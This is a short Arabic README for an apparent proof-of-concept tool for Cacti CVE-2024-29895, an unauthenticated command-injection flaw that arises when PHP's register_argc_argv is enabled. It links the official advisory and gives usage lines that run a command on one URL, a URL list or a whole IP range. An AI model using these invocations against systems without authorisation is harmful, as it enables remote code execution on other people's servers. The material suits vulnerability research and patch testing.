
إثبات المفهوم لـ Cacti CVE-2024-29895
Cacti CVE-2024-29895 POC ثغرة حقن أوامر تسمح لأي مستخدم غير مصادق بتنفيذ أوامر عشوائية على الخادم عندما يكون خيار register_argc_argv في PHP مفعّلاً.
https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
الاستخدام: app -m http://site.com/ -c whoami
أو: app -w url_list.txt -c whoami
أو: app -r 192.168.1.0/24 -c whoami